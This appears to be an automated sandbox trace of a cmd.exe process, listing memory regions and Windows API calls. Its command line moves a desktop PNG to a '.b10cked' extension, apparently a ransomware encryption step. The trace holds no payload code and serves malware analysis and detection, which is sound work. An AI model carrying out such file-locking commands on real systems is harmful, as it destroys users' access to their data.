\"C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32944 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32945 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32946 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32947 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32948 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32949 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32950 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32951 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32952 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 32953 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33128 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33129 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33130 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33131 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 33132 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 33133 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33134 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33135 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33136 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33137 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33138 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33139 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33140 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33141 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33142 start_va = 0xd0000 end_va = 0x197fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33143 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33144 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33145 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 33146 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 33147 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 33148 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 33149 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 33150 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 33151 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Thread: id = 782 os_tid = 0xe4c [0220.659] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2eff5c | out: lpSystemTimeAsFileTime=0x2eff5c*(dwLowDateTime=0xb85398a0, dwHighDateTime=0x1d440a9)) [0220.659] GetCurrentProcessId () returned 0xedc [0220.659] GetCurrentThreadId () returned 0xe4c [0220.659] GetTickCount () returned 0x3d93e [0220.659] QueryPerformanceCounter (in: lpPerformanceCount=0x2eff54 | out: lpPerformanceCount=0x2eff54*=27744865440) returned 1 [0220.660] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.660] __set_app_type (_Type=0x1) [0220.660] __p__fmode () returned 0x76b331f4 [0220.660] __p__commode () returned 0x76b331fc [0220.660] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.660] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.660] GetCurrentThreadId () returned 0xe4c [0220.660] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe4c) returned 0x38 [0220.660] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.660] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.661] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.661] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.661] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efeec | out: phkResult=0x2efeec*=0x0) returned 0x2 [0220.661] VirtualQuery (in: lpAddress=0x2eff23, lpBuffer=0x2efebc, dwLength=0x1c | out: lpBuffer=0x2efebc*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.661] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efebc, dwLength=0x1c | out: lpBuffer=0x2efebc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.661] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efebc, dwLength=0x1c | out: lpBuffer=0x2efebc*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.661] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efebc, dwLength=0x1c | out: lpBuffer=0x2efebc*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.661] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efebc, dwLength=0x1c | out: lpBuffer=0x2efebc*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.661] GetConsoleOutputCP () returned 0x1b5 [0220.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.661] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.661] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.662] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.662] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.662] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.662] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.662] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.662] GetEnvironmentStringsW () returned 0x410178* [0220.662] FreeEnvironmentStringsW (penv=0x410178) returned 1 [0220.662] GetEnvironmentStringsW () returned 0x410178* [0220.663] FreeEnvironmentStringsW (penv=0x410178) returned 1 [0220.663] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee5c | out: phkResult=0x2eee5c*=0x40) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0xa0, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x1, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0x1, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x0, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x40, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x40, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0x40, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegCloseKey (hKey=0x40) returned 0x0 [0220.663] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee5c | out: phkResult=0x2eee5c*=0x40) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0x40, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x1, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0x1, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x0, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x9, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x4, lpData=0x2eee68*=0x9, lpcbData=0x2eee60*=0x4) returned 0x0 [0220.663] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee64, lpData=0x2eee68, lpcbData=0x2eee60*=0x1000 | out: lpType=0x2eee64*=0x0, lpData=0x2eee68*=0x9, lpcbData=0x2eee60*=0x1000) returned 0x2 [0220.663] RegCloseKey (hKey=0x40) returned 0x0 [0220.663] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.663] srand (_Seed=0x5b8863b6) [0220.663] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked\"" [0220.663] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked\"" [0220.664] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.664] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4118d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.664] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.664] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.664] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.664] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.664] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.664] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.664] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.664] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.664] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.664] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.664] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.664] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.664] GetEnvironmentStringsW () returned 0x4122c8* [0220.665] FreeEnvironmentStringsW (penv=0x4122c8) returned 1 [0220.665] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.665] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.665] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.665] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.665] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.665] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.665] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.665] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.665] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.665] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.665] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efc28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.665] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efc28, lpFilePart=0x2efc24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efc24*="Desktop") returned 0x18 [0220.665] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.665] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef9a4 | out: lpFindFileData=0x2ef9a4) returned 0x410008 [0220.665] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.665] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef9a4 | out: lpFindFileData=0x2ef9a4) returned 0x410008 [0220.665] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.666] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef9a4 | out: lpFindFileData=0x2ef9a4) returned 0x410008 [0220.666] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.666] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.666] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.666] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.666] GetEnvironmentStringsW () returned 0x412ae8* [0220.666] FreeEnvironmentStringsW (penv=0x412ae8) returned 1 [0220.666] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.667] GetConsoleOutputCP () returned 0x1b5 [0220.667] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.667] GetUserDefaultLCID () returned 0x409 [0220.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efd68, cchData=128 | out: lpLCData="0") returned 2 [0220.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efd68, cchData=128 | out: lpLCData="0") returned 2 [0220.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efd68, cchData=128 | out: lpLCData="1") returned 2 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.668] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.668] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.669] GetConsoleTitleW (in: lpConsoleTitle=0x4008d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.669] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.669] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.669] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.670] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.670] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.670] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.670] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.670] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.670] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.670] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.673] GetConsoleTitleW (in: lpConsoleTitle=0x2efa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.674] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.674] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.674] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.674] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.674] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.674] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.674] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.674] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.674] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.674] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.674] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.674] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.674] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.674] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.674] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.674] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.674] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.674] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.674] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.674] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.674] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.674] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.674] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.674] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.674] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.675] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.675] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.675] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.675] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.675] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.675] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.675] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.675] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.675] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.675] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.676] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.676] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.677] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef81c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef814, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef814*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.677] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 